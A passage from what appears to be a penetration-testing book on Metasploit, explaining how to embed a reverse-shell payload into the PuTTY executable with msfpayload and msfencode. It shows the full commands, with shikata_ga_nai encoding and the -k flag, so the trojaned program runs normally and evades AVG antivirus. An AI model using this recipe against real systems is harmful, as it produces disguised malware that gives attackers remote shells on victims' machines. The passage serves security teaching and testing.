background image

106

Chapter 7

Figure 7-4: The backdoored executable is not detected by AVG.

Launching a Payload Stealthily

For the most part, when a targeted user launches a backdoored executable 
such as the one we just generated, nothing will appear to happen, and that 
can raise suspicions. To improve your chances of not tipping off a target, you 
can launch a payload while simultaneously continuing normal execution of 
the launched application, as shown here:

root@bt:/opt/framework3/msf3# 

wget http://the.earth.li/~sgtatham/

putty/latest/x86/putty.exe 

. . . SNIP . . .

2011-03-21 17:02:48 (133 KB/s) – 'putty.exe' saved [454656/454656]
root@bt:/opt/framework3/msf3# 

msfpayload windows/shell_reverse_tcp

LHOST=192.168.1.101 LPORT=8080 R | msfencode -t exe -x putty.exe -o /var/
www/putty_backdoor.exe -e x86/shikata_ga_nai -k   -c 5

[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 423 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 450 (iteration=5)

In this listing, we download the PuTTY Windows SSH client at   and 

then access PuTTY using the 

-k

 flag at  . The 

-k

 flag configures the payload 

to launch in a separate thread from the main executable so the application 
will behave normally while the payload is being executed. Now, as shown in 
Figure 7-5, when this executable is processed with AVG, it comes back clean 
and should execute while still presenting us with a shell! (This option may 
not work with all executables, so be sure to test yours before deployment.)

When choosing to embed a payload in an executable, you should con-

sider using GUI-based applications if you’re not specifying the 

-k

 flag. If you 

embed a payload into a console-based application, when the payload is run, 
it will display a console window that won’t close until you’re finished using 
the payload. If you choose a GUI-based application and do not specify the 

-k